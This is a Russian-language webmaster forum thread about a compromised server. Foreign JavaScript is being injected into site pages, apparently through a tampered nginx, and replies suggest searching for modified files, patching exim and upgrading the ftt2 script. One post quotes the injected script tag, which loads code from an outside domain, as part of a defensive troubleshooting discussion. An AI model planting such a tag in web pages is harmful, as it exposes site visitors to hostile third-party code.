С нами с 16.07.09
Сообщения: 180
Рейтинг: 188
|
Добавлено: 19/09/19 в 14:16 |
привет
на странцах сайта на ftt2 и streamrotator вижу чужеродный код после <base target=_blank>
в темплейтах этого кода нет, в кэше streamrotator тож нету
кто то сталкивался?
где искать корень проблемы? как лечить?
спасибо!
|
|
|
|
С нами с 28.02.03
Сообщения: 8544
Рейтинг: 1609
|
Добавлено: 19/09/19 в 17:51 |
поищи файлы которые правили ,
вот пример: поиск файла который правили с 17 августа с 11:35 до 12:17
find /path/to/dir/ -mindepth 1 -newermt '2019-08-17 11:35' ! -newermt '2019-08-17 12:17' -ls
зы если у тебя vps то многих сейчас ломают через дрявый exim
если он стоит надо его обновлять
|
|
|
|
С нами с 16.07.09
Сообщения: 180
Рейтинг: 188
|
Добавлено: 19/09/19 в 21:44 |
пасиб, Alexs
exim не при делах, вроде бы.
по поводу изменённых файлов - по всему серваку что ли искать?...
дело тут вот какое
есть, к примеру файл, всё его содержимое:
<base target=_blank>
файл создал вручную, он никаким боком не касается ни стрима ни фтт.
когда открываю файл в браузере - после <base target=_blank> добавляется
<script data-cfasync="false" type="text/javascript" src="//tsyndolls.com/t/9/fret/meow4/1595466/brt.js"></script>
это точно не мой код.
вопрос - кто его добавляет? apache? nginx?
|
|
|
|
+
С нами с 09.05.17
Сообщения: 661
Рейтинг: 586
|
Добавлено: 19/09/19 в 21:47 |
|
|
|
|
Прожигатель жизни
С нами с 20.10.05
Сообщения: 942
Рейтинг: 638
|
Добавлено: 20/09/19 в 08:25 |
А ты страницу смотришь именно как view source или через inspect?
Если второй вариант, то скорее всего какой-то другой JS добавляет его.
|
|
|
|
С нами с 16.07.09
Сообщения: 180
Рейтинг: 188
|
Добавлено: 26/09/19 в 15:29 |
Oswell E. Spencer, спасибо за ссылки
в конфигах nginx нет ничего лишнего. вставил замену по правилам, указанным по ссылке - пропал чужеродный код. прошло пару дней - опять появился. правило, которое я вставил в конфиг при этом - пропало из конфига
вставил правило повторно - смотрю.
Anab0L1k, код вижу в page source, не в инспекте. хотя в инспекте код посторонний тож присутствует
|
|
|
|
С нами с 16.07.09
Сообщения: 180
Рейтинг: 188
|
Добавлено: 26/09/19 в 15:34 |
вот я кстати смотрю, что скорее не правила, мной добавленные, а просто тупо рестарт nginx избавляет от внедрения постороннего кода в страницы.
какие есть мысли, парни? чё делать дальше?
|
|
|
|
С нами с 28.02.03
Сообщения: 8544
Рейтинг: 1609
|
Добавлено: 27/09/19 в 15:49 |
theman писал: | вот я кстати смотрю, что скорее не правила, мной добавленные, а просто тупо рестарт nginx избавляет от внедрения постороннего кода в страницы.
какие есть мысли, парни? чё делать дальше? |
https://habr.com/ru/post/465355/
буквально не давно читал занятную статью, как чуваку залили nginx с блэкджеком и
шлюхами
по хорошему Я бы приставил систему
ну или как минимум переставил nginx и обновил систему
|
|
|
|
+ + +
С нами с 28.10.11
Сообщения: 564
Рейтинг: -127
|
Добавлено: 17/01/20 в 03:18 |
Alexs писал: | https://habr.com/ru/post/465355/
буквально не давно читал занятную статью, как чуваку залили nginx с блэкджеком и
шлюхами
по хорошему Я бы приставил систему
ну или как минимум переставил nginx и обновил систему |
в статье так и не сказали как получили доступ к серверу
|
|
|
|
С нами с 12.04.02
Сообщения: 10405
Рейтинг: 908
|
Добавлено: 21/01/20 в 05:30 |
похоже тоже поломали нах ! админка выдает 404 так же го пхп 404 а страницы есть. у друга на моем сервак свой акк там все пашет у меня нет
подскажите в скайпе Серч или кто там с ссаппорта есть ? вроде в скайпе раньше общались а в асе его с суботы не было
|
|
|
|
С нами с 23.11.02
Сообщения: 154
Рейтинг: 90
|
Добавлено: 22/01/20 в 13:10 |
Найдена серьезная уязвимость в ftt2. Рекомендуется проапдейтиться до последней версии (2.3.6). Там она исправлена.
|
|
|
|
С нами с 12.04.02
Сообщения: 10405
Рейтинг: 908
|
Добавлено: 23/01/20 в 05:36 |
снова 404 опять поломали бляди
|
|
|
|
С нами с 20.10.04
Сообщения: 3851
Рейтинг: 1044
|
Добавлено: 24/01/20 в 08:15 |
ошибка
|
|
|
|